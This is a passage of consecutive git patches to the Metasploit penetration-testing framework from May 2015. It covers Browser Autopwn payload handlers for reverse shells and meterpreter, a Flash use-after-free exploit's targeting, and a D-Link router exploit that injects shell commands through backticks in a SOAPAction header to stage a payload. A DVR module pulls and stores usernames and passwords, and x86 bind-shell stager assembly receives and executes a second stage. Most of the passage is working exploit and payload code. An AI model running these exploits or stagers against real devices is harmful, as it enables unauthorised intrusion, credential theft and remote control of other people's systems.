+        unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
+          print_status("Started reverse double SSL handler on #{ip}:#{local_port} #{via}")
+        end
         break
       rescue
         ex = $!
diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
index 774ab5ab27..d23e419516 100644
--- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
@@ -46,43 +46,26 @@ class Metasploit3 < Msf::Exploit::Remote
         {
           :source  => /script|headers/i,
           :arch    => ARCH_X86,
-          :os_name => lambda do |os|
-              os =~ OperatingSystems::Match::LINUX ||
-              os =~ OperatingSystems::Match::WINDOWS_7
-            end,
-          :ua_name => lambda do |ua|
-            case target.name
-            when 'Windows'
-              return true if ua == Msf::HttpClients::IE
-            when 'Linux'
-              return true if ua == Msf::HttpClients::FF
-            end
-
-            false
-          end,
-          :flash   => lambda do |ver|
-            case target.name
-            when 'Windows'
-              return true if ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287')
-            when 'Linux'
-              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.438')
-            end
-
-            false
-          end
+          :flash   => lambda { |ver| ver.to_i.between?(11, 16) }
         },
       'Targets'             =>
         [
           [ 'Windows',
             {
               'Platform' => 'win',
-              'Arch'     => ARCH_X86
+              'os_name'  => OperatingSystems::Match::WINDOWS,
+              'Arch'     => ARCH_X86,
+              'ua_name'  => Msf::HttpClients::IE,
+              'flash'   => lambda { |ver| ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287') }
             }
           ],
           [ 'Linux',
             {
               'Platform' => 'unix',
-              'Arch'     => ARCH_CMD
+              'Arch'     => ARCH_CMD,
+              'os_name'  => OperatingSystems::Match::LINUX,
+              'ua_name'  => Msf::HttpClients::FF,
+              'flash'   => lambda { |ver| ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.438') }
             }
           ]
         ],
@@ -113,12 +96,12 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit_template(cli, target_info)
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
 
-    if target.name =~ /Windows/
+    if get_target.name =~ /Windows/
       target_payload = get_payload(cli, target_info)
       psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
       b64_payload = Rex::Text.encode_base64(psh_payload)
       platform_id = 'win'
-    elsif target.name =~ /Linux/
+    elsif get_target.name =~ /Linux/
       target_payload = get_payload(cli, target_info.merge(arch: ARCH_CMD))
       b64_payload = Rex::Text.encode_base64(target_payload)
       platform_id = 'linux'

From 7f4b51f0ffabcbe6071b06902513ee43d38fae09 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 23 May 2015 02:08:51 -0500
Subject: [PATCH 0166/1013] Fix nil bug

---
 lib/msf/core/exploit/remote/browser_exploit_server.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index f4f173e815..074202b8e0 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -582,7 +582,7 @@ module Msf
       platform = platform.gsub(/^Windows.*$/, 'Windows')
 
       p = regenerate_payload(cli, platform, arch)
-      target_arch = get_target.arch
+      target_arch = get_target.arch || arch
 
       unless p.arch.all? { |e| target_arch.include?(e) }
         err =  "The payload arch (#{p.arch * ", "}) is incompatible with the target (#{target_arch * "\n"}). "

From f378b45408f0a0c946839a83b9ea2e7c5794a83f Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 23 May 2015 05:06:15 -0500
Subject: [PATCH 0167/1013] bug fixes, sorta

---
 lib/msf/core/exploit/browserautopwnv2.rb | 20 +++++++-------------
 1 file changed, 7 insertions(+), 13 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 6dacabcb28..215de88455 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -27,7 +27,7 @@ module Msf
     # The hash key is the name of the platform that matches what's on the module.
     # The loader order is specific while starting them up.
     DEFAULT_PAYLOADS = {
-      'firefox' => { 'payload' => 'firefox/shell_reverse_tcp',         'lport' => 4442 },
+      'firefox' => { 'payload' => 'generic/shell_reverse_tcp',         'lport' => 4442 },
       'android' => { 'payload' => 'android/meterpreter/reverse_tcp',   'lport' => 4443 },
       'win'     => { 'payload' => 'windows/meterpreter/reverse_tcp',   'lport' => 4444 },
       'linux'   => { 'payload' => 'linux/x86/meterpreter/reverse_tcp', 'lport' => 4445 },
@@ -279,14 +279,12 @@ module Msf
     # @return [TrueClass] Payload is wanted.
     # @return [FalseClass] Payload is not wanted.
     def is_payload_handler_wanted?(payload_name)
-      p = framework.payloads.create(payload_name)
-      return false unless p
-
-      payload_platforms = p.platform.platforms
-
       bap_exploits.each do |m|
-        module_platforms = m.platform.platforms
-        return true if payload_platforms.all? { |e| module_platforms.include? e}
+        return true if m.datastore['PAYLOAD'] == payload_name
+
+        m.compatible_payloads.each do |name, obj|
+          return true if name == payload_name
+        end
       end
 
       false
@@ -342,9 +340,6 @@ module Msf
       return if datastore['MaxSessions'] == 0
 
       DEFAULT_PAYLOADS.each_pair do |platform, listener_info|
-        # Exploit failed: firefox/shell_reverse_tcp is not a compatible payload
-        next if listener_info['payload'] == 'firefox/shell_reverse_tcp'
-
         # Don't waste resources. This shaves about a second in loading speed.
         next unless is_payload_handler_wanted?(listener_info['payload'])
 
@@ -475,13 +470,12 @@ module Msf
       order = 1
 
       bap_exploits.each do |m|
-        payload_used = m.datastore['PAYLOAD'] != 'firefox/shell_reverse_tcp' && m.fullname =~ /^exploit\/multi/ ? 'Multiple payload handlers are used' : "#{m.datastore['PAYLOAD']} on #{m.datastore['LPORT']}"
         row = []
         row << order
         row << parse_rank(m.rank)
         row << m.shortname
         row << m.datastore['URIPATH'] if datastore['VERBOSE']
-        row << payload_used
+        row << "#{m.datastore['PAYLOAD']}"
         table << row
         order += 1
       end

From a3764647100e7fc90406542eda7034f28bae58f9 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 23 May 2015 05:26:13 -0500
Subject: [PATCH 0168/1013] It kind of blew up

---
 lib/msf/core/exploit/browserautopwnv2.rb | 22 ++++++++++++++--------
 1 file changed, 14 insertions(+), 8 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 215de88455..4a01ad1194 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -27,7 +27,7 @@ module Msf
     # The hash key is the name of the platform that matches what's on the module.
     # The loader order is specific while starting them up.
     DEFAULT_PAYLOADS = {
-      'firefox' => { 'payload' => 'generic/shell_reverse_tcp',         'lport' => 4442 },
+      'firefox' => { 'payload' => 'firefox/shell_reverse_tcp',         'lport' => 4442 },
       'android' => { 'payload' => 'android/meterpreter/reverse_tcp',   'lport' => 4443 },
       'win'     => { 'payload' => 'windows/meterpreter/reverse_tcp',   'lport' => 4444 },
       'linux'   => { 'payload' => 'linux/x86/meterpreter/reverse_tcp', 'lport' => 4445 },
@@ -279,12 +279,14 @@ module Msf
     # @return [TrueClass] Payload is wanted.
     # @return [FalseClass] Payload is not wanted.
     def is_payload_handler_wanted?(payload_name)
-      bap_exploits.each do |m|
-        return true if m.datastore['PAYLOAD'] == payload_name
+      p = framework.payloads.create(payload_name)
+      return false unless p
 
-        m.compatible_payloads.each do |name, obj|
-          return true if name == payload_name
-        end
+      payload_platforms = p.platform.platforms
+
+      bap_exploits.each do |m|
+        module_platforms = m.platform.platforms
+        return true if payload_platforms.all? { |e| module_platforms.include? e}
       end
 
       false
@@ -340,6 +342,9 @@ module Msf
       return if datastore['MaxSessions'] == 0
 
       DEFAULT_PAYLOADS.each_pair do |platform, listener_info|
+        # Exploit failed: firefox/shell_reverse_tcp is not a compatible payload
+        next if listener_info['payload'] == 'firefox/shell_reverse_tcp'
+
         # Don't waste resources. This shaves about a second in loading speed.
         next unless is_payload_handler_wanted?(listener_info['payload'])
 
@@ -470,12 +475,13 @@ module Msf
       order = 1
 
       bap_exploits.each do |m|
+        payload_used = m.datastore['PAYLOAD'] != 'firefox/shell_reverse_tcp' && m.fullname =~ /^exploit\/multi/ ? 'Multiple payload handlers are used' : "#{m.datastore['PAYLOAD']} on #{m.datastore['LPORT']}"
         row = []
         row << order
         row << parse_rank(m.rank)
         row << m.shortname
         row << m.datastore['URIPATH'] if datastore['VERBOSE']
-        row << "#{m.datastore['PAYLOAD']}"
+        row << payload_used
         table << row
         order += 1
       end
@@ -744,4 +750,4 @@ module Msf
     end
 
   end
-end
+end
\ No newline at end of file

From 10baf1ebb670f4f3c63613732cc97d5a546b07db Mon Sep 17 00:00:00 2001
From: Michael Messner <devnull@s3cur1ty.de>
Date: Sat, 23 May 2015 15:50:35 +0200
Subject: [PATCH 0169/1013] echo stager

---
 lib/rex/exploitation/cmdstager/echo.rb        | 12 ++--
 .../http/dlink_upnp_header_exec_noauth.rb     | 67 +++++++------------
 2 files changed, 34 insertions(+), 45 deletions(-)

diff --git a/lib/rex/exploitation/cmdstager/echo.rb b/lib/rex/exploitation/cmdstager/echo.rb
index 0891a4b625..253eb48214 100644
--- a/lib/rex/exploitation/cmdstager/echo.rb
+++ b/lib/rex/exploitation/cmdstager/echo.rb
@@ -26,10 +26,14 @@ class CmdStagerEcho < CmdStagerBase
   # and initialize opts[:enc_format].
   #
   def generate(opts = {})
-    opts[:temp] = opts[:temp] || '/tmp/'
-    opts[:temp].gsub!(/\\/, "/")
-    opts[:temp] = opts[:temp].shellescape
-    opts[:temp] << '/' if opts[:temp][-1,1] != '/'
+    if opts[:temp] == false
+      opts[:temp] = ''
+    else
+      opts[:temp] = opts[:temp] || '/tmp/'
+      opts[:temp].gsub!(/\\/, "/")
+      opts[:temp] = opts[:temp].shellescape
+      opts[:temp] << '/' if opts[:temp][-1,1] != '/'
+    end
 
     # by default use the 'hex' encoding
     opts[:enc_format] = opts[:enc_format] || 'hex'
diff --git a/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
index 7407e68ce7..28aa2c61a3 100644
--- a/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Auxiliary::CommandShell
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Author'      =>
         [
           'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645
-          'Craig Heffner', # independent Vulnerability discovery on different other routers
+          'Craig Heffner',  # independent Vulnerability discovery on different other routers
           'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
         ],
       'License'     => MSF_LICENSE,
@@ -37,13 +37,25 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate' => 'Feb 13 2015',
       'Privileged'     => true,
       'Platform'       => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Targets'        =>
+      'Targets' =>
         [
-          [ 'Automatic',        { } ]
+          [ 'MIPS Little Endian',
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPSLE
+            }
+          ],
+          [ 'MIPS Big Endian',  # unknown if there are BE devices out there ... but in case we have a target
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPS
+            }
+          ],
         ],
-      'DefaultTarget'  => 0
+      'DefaultTarget'    => 0
       ))
+
+      deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
   end
 
   def check
@@ -77,47 +89,20 @@ class Metasploit3 < Msf::Exploit::Remote
 
     print_status("#{peer} - Exploiting...")
 
-    telnetport = rand(32767) + 32768
+    execute_cmdstager(
+      :flavor  => :echo,
+      :linemax => 200,
+      :temp    => false
+    )
 
-    cmd = "telnetd -p #{telnetport}"
-
-    execute_command(cmd)
-
-    handle_telnet(telnetport)
   end
 
-  def handle_telnet(telnetport)
-
-    begin
-      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
-
-      if sock
-        print_good("#{peer} - Backdoor service spawned")
-        add_socket(sock)
-      else
-        fail_with(Failure::Unreachable, "#{peer} - Backdoor service not spawned")
-      end
-
-      print_status "Starting a Telnet session #{rhost}:#{telnetport}"
-      merge_me = {
-        'USERPASS_FILE' => nil,
-        'USER_FILE'     => nil,
-        'PASS_FILE'     => nil,
-        'USERNAME'      => nil,
-        'PASSWORD'      => nil
-      }
-      start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
-    rescue
-      fail_with(Failure::Unreachable, "#{peer} - Backdoor service not handled")
-    end
-    return
-  end
-
-  def execute_command(cmd)
+  def execute_command(cmd, opts)
 
     uri = '/HNAP1/'
 
-    soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd}`"
+    cmd_new = "cd && cd tmp && export PATH=$PATH:. && " << cmd
+    soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
 
     begin
       res = send_request_cgi({

From 6fb2da4f62e63e026aa2127a6c2883446a50eca3 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Sat, 23 May 2015 13:56:49 -0400
Subject: [PATCH 0170/1013] Fix #5391, cmd stager documentation fixes

---
 lib/msf/core/exploit/cmdstager.rb | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb
index ae570e1cd3..692f4fda2c 100644
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -127,8 +127,8 @@ module Exploit::CmdStager
 
   # Show the progress of the upload while cmd staging
   #
-  # @param total [Float] The total number of bytes to send
-  # @param sent [Float] The number of bytes sent
+  # @param total [Float] The total number of bytes to send.
+  # @param sent [Float] The number of bytes sent.
   # @return [void]
   def progress(total, sent)
     done = (sent.to_f / total.to_f) * 100
@@ -308,9 +308,10 @@ module Exploit::CmdStager
   def execute_cmdstager_end(opts)
   end
 
-  # Code to execute each command from the. This method is designed to be
-  # overriden by a module using this mixin.
+  # Code called to execute each command via an arbitrary module-defined vector.
+  # This method needs to be overriden by modules using this mixin.
   #
+  # @param cmd [String] The command to execute.
   # @param opts [Hash] Hash of configuration options.
   def execute_command(cmd, opts)
     raise NotImplementedError

From 7089bd945a15e1e2c3ba6f713347d6b26e45cbbe Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sun, 24 May 2015 12:47:20 -0500
Subject: [PATCH 0171/1013] This payload handling looks much better

---
 lib/msf/core/exploit/browserautopwnv2.rb | 33 ++++++++++++++++--------
 1 file changed, 22 insertions(+), 11 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 4a01ad1194..0d194ea70a 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -26,6 +26,7 @@ module Msf
     # The default platform-specific payloads and preferred LPORTS.
     # The hash key is the name of the platform that matches what's on the module.
     # The loader order is specific while starting them up.
+    # Firefox payloads use generic handlers.
     DEFAULT_PAYLOADS = {
       'firefox' => { 'payload' => 'firefox/shell_reverse_tcp',         'lport' => 4442 },
       'android' => { 'payload' => 'android/meterpreter/reverse_tcp',   'lport' => 4443 },
@@ -339,22 +340,31 @@ module Msf
     # @see #payload_job_ids
     # @return [void]
     def start_payload_listeners
+      # Spawn nothing if the user doesn't want to pop sessions.
       return if datastore['MaxSessions'] == 0
 
-      DEFAULT_PAYLOADS.each_pair do |platform, listener_info|
-        # Exploit failed: firefox/shell_reverse_tcp is not a compatible payload
-        next if listener_info['payload'] == 'firefox/shell_reverse_tcp'
+      wanted_payloads = []
+      bap_exploits.each do |mod|
+        wanted_payloads << {
+          :payload_name => mod.datastore['PAYLOAD'], :payload_lport => mod.datastore['LPORT']
+        }
+      end
 
-        # Don't waste resources. This shaves about a second in loading speed.
-        next unless is_payload_handler_wanted?(listener_info['payload'])
+      # Don't repeat launching payload handlers
+      wanted_payloads.uniq! { |e| e[:payload_name] }
 
+      wanted_payloads.each do |wanted|
         multi_handler = framework.modules.create('exploit/multi/handler')
+
+        # We have to special firefox
+        payload_name = wanted[:payload_name].include?('firefox/') ? wanted[:payload_name].gsub('firefox/', 'generic/') : wanted[:payload_name]
+
         # User configurable options
         # We could do a massive multi_handler.datastore.merge!(self.datastore), but this seems
         # really expensive. Costs more loading time.
         multi_handler.datastore['LHOST']                = get_payload_lhost
-        multi_handler.datastore['PAYLOAD']              = get_selected_payload_name(platform)
-        multi_handler.datastore['LPORT']                = get_selected_payload_lport(platform)
+        multi_handler.datastore['PAYLOAD']              = payload_name
+        multi_handler.datastore['LPORT']                = wanted[:payload_lport]
         multi_handler.datastore['DebugOptions']         = datastore['DebugOptions'] if datastore['DebugOptions']
         multi_handler.datastore['AutoLoadAndroid']      = datastore['AutoLoadAndroid'] if datastore['AutoLoadAndroid']
         multi_handler.datastore['PrependMigrate']       = datastore['PrependMigrate'] if datastore['PrependMigrate']
@@ -371,7 +381,7 @@ module Msf
         multi_handler.exploit_simple(
           'LocalInput' => self.user_input,
           'LocalOutput' => self.user_output,
-          'Payload' => listener_info['payload'],
+          'Payload' => payload_name,
           'RunAsJob' => true
         )
         @payload_job_ids << multi_handler.job_id
@@ -388,7 +398,8 @@ module Msf
     end
 
 
-    # Returns the selected payload.
+    # Returns the selected payload. This method will choose a compatible payload based on the
+    # default list.
     #
     # @param [Object] m A module that's been initialized.
     # @return [String] Payload name. Example: 'windows/meterpreter/reverse_tcp'
@@ -396,6 +407,7 @@ module Msf
       selected_payload = DEFAULT_PAYLOADS['generic']
       DEFAULT_PAYLOADS.each_pair do |p, info|
         preferred = info['payload']
+
         m.compatible_payloads.each do |k|
           return info if k[0] == preferred
         end
@@ -475,13 +487,12 @@ module Msf
       order = 1
 
       bap_exploits.each do |m|
-        payload_used = m.datastore['PAYLOAD'] != 'firefox/shell_reverse_tcp' && m.fullname =~ /^exploit\/multi/ ? 'Multiple payload handlers are used' : "#{m.datastore['PAYLOAD']} on #{m.datastore['LPORT']}"
         row = []
         row << order
         row << parse_rank(m.rank)
         row << m.shortname
         row << m.datastore['URIPATH'] if datastore['VERBOSE']
-        row << payload_used
+        row << "#{m.datastore['PAYLOAD']} on #{m.datastore['LPORT']}"
         table << row
         order += 1
       end

From a3ff9859c8d21b08a7622dd2719f967007a0e685 Mon Sep 17 00:00:00 2001
From: Nicholas Starke <starke.nicholas@gmail.com>
Date: Sun, 24 May 2015 15:03:06 -0500
Subject: [PATCH 0172/1013] Adding Credentials Capabilities

This commit adds the ability for credentials
to be retrieved via the 'creds' command.  It
also contains a few miscellaneous stylistic
syntax changes.
---
 .../gather/avtech744_dvr_account_retrieval.rb | 82 ++++++++++++++++---
 1 file changed, 70 insertions(+), 12 deletions(-)

diff --git a/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb b/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb
index e7cdfb5ed0..f80f61047b 100644
--- a/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb
+++ b/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb
@@ -3,6 +3,7 @@ require 'msf/core'
     class Metasploit3 < Msf::Auxiliary
 
         include Msf::Exploit::Remote::HttpClient
+        include Msf::Auxiliary::Report
 
         def initialize(info = {})
             super(update_info(info,
@@ -34,19 +35,76 @@ require 'msf/core'
                 }
             })
 
-            if (res != nil)
-                res.body.each_line { |line|
-                    split = line.split('=')
-                    key = split[0]
-                    value = split[1]
-                    if (key && value)
-                        print_good("#{key} - #{value}")
+            unless res
+                fail_with(Failure::Unreachable, "No response received from the target")
+            end
+
+            unless res.code == 200
+                fail_with(Failure::Unknown, "An unknown error occured")
+            end
+
+            raw_collection = extract_data(res.body)
+            extract_creds(raw_collection)
+
+            p = store_loot('avtech744.dvr.accounts', 'text/plain', rhost, res.body)
+            print_good("avtech744.dvr.accounts stored in #{p}")
+        end
+
+        def extract_data(body)
+            raw_collection = []
+            body.each_line do |line|
+                key, value = line.split('=')
+                if key && value
+                    _, second, third = key.split('.')
+                    if third
+                        index = second.slice(second.length - 1).to_i
+                        raw_collection[index] = raw_collection[index] ||= {}
+                        case third
+                        when "Username"
+                            raw_collection[index][:username] = value.strip!
+                        when "Password"
+                            raw_collection[index][:password] = value.strip!
+                        end
+                    elsif second.include? "Password"
+                          print_good("PIN Retrieved: #{key} - #{value.strip!}")
                     end
-                }
-                p = store_loot('avtech744.dvr.accounts', 'text/plain', rhost, res.body)
-                print_good("avtech744.dvr.accounts stored in #{p}")
-            else
-                print_error("Unable to receive a response")
+                end
+            end
+            raw_collection
+        end
+
+        def extract_creds(raw_collection)
+            raw_collection.each do |raw|
+                if raw
+                    service_data = {
+                        address: rhost,
+                        port: rport,
+                        service_name: 'http',
+                        protocol: 'tcp',
+                        workspace_id: myworkspace_id
+                    }
+
+                    credential_data = {
+                        module_fullname: self.fullname,
+                        origin_type: :service,
+                        private_data: raw[:password],
+                        private_type: :password,
+                        username: raw[:username]
+                    }
+
+                    credential_data.merge!(service_data)
+
+                    credential_core = create_credential(credential_data)
+
+                    login_data = {
+                        core: credential_core,
+                        status: Metasploit::Model::Login::Status::UNTRIED
+                    }
+
+                    login_data.merge!(service_data)
+
+                    create_credential_login(login_data)
+                end
             end
         end
     end

From 9042f141ff026744084f01908f82a13edaa79490 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 25 May 2015 11:21:28 +1000
Subject: [PATCH 0173/1013] Implement the IPv6 UUID bind stagers

---
 lib/msf/core/payload/windows/bind_tcp.rb      | 64 +++++++++-----
 lib/msf/core/payload/windows/reverse_tcp.rb   |  2 +
 lib/msf/core/payload/windows/send_uuid.rb     | 10 +++
 lib/msf/core/payload/windows/x64/bind_tcp.rb  | 88 ++++++++++++++-----
 .../core/payload/windows/x64/reverse_tcp.rb   |  2 +
 lib/msf/core/payload/windows/x64/send_uuid.rb | 10 +++
 .../payloads/stagers/windows/bind_ipv6_tcp.rb | 57 ++++--------
 .../stagers/windows/bind_ipv6_tcp_uuid.rb     | 45 ++++++++++
 .../stagers/windows/x64/bind_ipv6_tcp.rb      | 40 +++++++++
 .../stagers/windows/x64/bind_ipv6_tcp_uuid.rb | 45 ++++++++++
 10 files changed, 278 insertions(+), 85 deletions(-)
 create mode 100644 modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb
 create mode 100644 modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb
 create mode 100644 modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb

diff --git a/lib/msf/core/payload/windows/bind_tcp.rb b/lib/msf/core/payload/windows/bind_tcp.rb
index c6488f2174..cec61940b7 100644
--- a/lib/msf/core/payload/windows/bind_tcp.rb
+++ b/lib/msf/core/payload/windows/bind_tcp.rb
@@ -54,6 +54,13 @@ module Payload::Windows::BindTcp
     transport_config_bind_tcp(opts)
   end
 
+  #
+  # Don't use IPv6 by default, this can be overridden by other payloads
+  #
+  def use_ipv6
+    false
+  end
+
   #
   # Generate and compile the stager
   #
@@ -84,6 +91,8 @@ module Payload::Windows::BindTcp
     # Reliability checks add 4 bytes for the first check, 5 per recv check (2)
     space += 14
 
+    space += uuid_required_size if include_send_uuid
+
     # The final estimated size
     space
   end
@@ -97,8 +106,16 @@ module Payload::Windows::BindTcp
   #
   def asm_bind_tcp(opts={})
 
-    reliable     = opts[:reliable]
-    encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
+    reliable      = opts[:reliable]
+    addr_fam      = 2
+    sockaddr_size = 16
+
+    if use_ipv6
+      addr_fam = 23
+      sockaddr_size = 28
+    end
+
+    encoded_port   = "0x%.8x" % [opts[:port].to_i, addr_fam].pack("vn").unpack("N").first
 
     asm = %Q^
       ; Input: EBP must be the address of 'api_call'.
@@ -109,42 +126,41 @@ module Payload::Windows::BindTcp
         push 0x00003233        ; Push the bytes 'ws2_32',0,0 onto the stack.
         push 0x5F327377        ; ...
         push esp               ; Push a pointer to the "ws2_32" string on the stack.
-        push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
         call ebp               ; LoadLibraryA( "ws2_32" )
 
         mov eax, 0x0190        ; EAX = sizeof( struct WSAData )
         sub esp, eax           ; alloc some space for the WSAData structure
         push esp               ; push a pointer to this stuct
         push eax               ; push the wVersionRequested parameter
-        push 0x006B8029        ; hash( "ws2_32.dll", "WSAStartup" )
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
         call ebp               ; WSAStartup( 0x0190, &WSAData );
 
-        push 8
+        push 11
         pop ecx
-      push_8_loop:
-        push eax               ; if we succeed, eax will be zero, push it 8 times for later ([1]-[8])
-        loop push_8_loop
+      push_0_loop:
+        push eax               ; if we succeed, eax will be zero, push it enough times
+                               ; to cater for both IPv4 and IPv6
+        loop push_0_loop
 
                                ; push zero for the flags param [8]
                                ; push null for reserved parameter [7]
                                ; we do not specify a WSAPROTOCOL_INFO structure [6]
                                ; we do not specify a protocol [5]
-        inc eax                ;
-        push eax               ; push SOCK_STREAM
-        inc eax                ;
-        push eax               ; push AF_INET
-        push 0xE0DF0FEA        ; hash( "ws2_32.dll", "WSASocketA" )
-        call ebp               ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
+        push 1                 ; push SOCK_STREAM
+        push #{addr_fam}       ; push AF_INET/6
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+        call ebp               ; WSASocketA( AF_INET/6, SOCK_STREAM, 0, 0, 0, 0 );
         xchg edi, eax          ; save the socket for later, don't care about the value of eax after this
 
-                               ; bind to 0.0.0.0, pushed earlier [4]
+                               ; bind to 0.0.0.0/[::], pushed earlier
 
         push #{encoded_port}   ; family AF_INET and port number
         mov esi, esp           ; save a pointer to sockaddr_in struct
-        push 16                ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused)
+        push #{sockaddr_size}  ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used)
         push esi               ; pointer to the sockaddr_in struct
         push edi               ; socket
-        push 0x6737DBC2        ; hash( "ws2_32.dll", "bind" )
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')}
         call ebp               ; bind( s, &sockaddr_in, 16 );
     ^
 
@@ -159,18 +175,18 @@ module Payload::Windows::BindTcp
     asm << %Q^
                                ; backlog, pushed earlier [3]
         push edi               ; socket
-        push 0xFF38E9B7        ; hash( "ws2_32.dll", "listen" )
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'listen')}
         call ebp               ; listen( s, 0 );
 
                                ; we set length for the sockaddr struct to zero, pushed earlier [2]
                                ; we dont set the optional sockaddr param, pushed earlier [1]
         push edi               ; listening socket
-        push 0xE13BEC74        ; hash( "ws2_32.dll", "accept" )
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'accept')}
         call ebp               ; accept( s, 0, 0 );
 
         push edi               ; push the listening socket
         xchg edi, eax          ; replace the listening socket with the new connected socket for further comms
-        push 0x614D6E75        ; hash( "ws2_32.dll", "closesocket" )
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
         call ebp               ; closesocket( s );
     ^
 
@@ -183,7 +199,7 @@ module Payload::Windows::BindTcp
         push 4                 ; length = sizeof( DWORD );
         push esi               ; the 4 byte buffer on the stack to hold the second stage length
         push edi               ; the saved socket
-        push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
         call ebp               ; recv( s, &dwLength, 4, 0 );
     ^
 
@@ -202,7 +218,7 @@ module Payload::Windows::BindTcp
         push 0x1000            ; MEM_COMMIT
         push esi               ; push the newly recieved second stage length.
         push 0                 ; NULL as we dont care where the allocation is.
-        push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
         call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
         ; Receive the second stage and execute it...
         xchg ebx, eax          ; ebx = our new memory address for the new stage
@@ -212,7 +228,7 @@ module Payload::Windows::BindTcp
         push esi               ; length
         push ebx               ; the current address into our second stage's RWX buffer
         push edi               ; the saved socket
-        push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
         call ebp               ; recv( s, buffer, length, 0 );
     ^
 
@@ -240,7 +256,7 @@ module Payload::Windows::BindTcp
       else
         asm << %Q^
       failure:
-        push 0x56A2B5F0        ; hardcoded to exitprocess for size
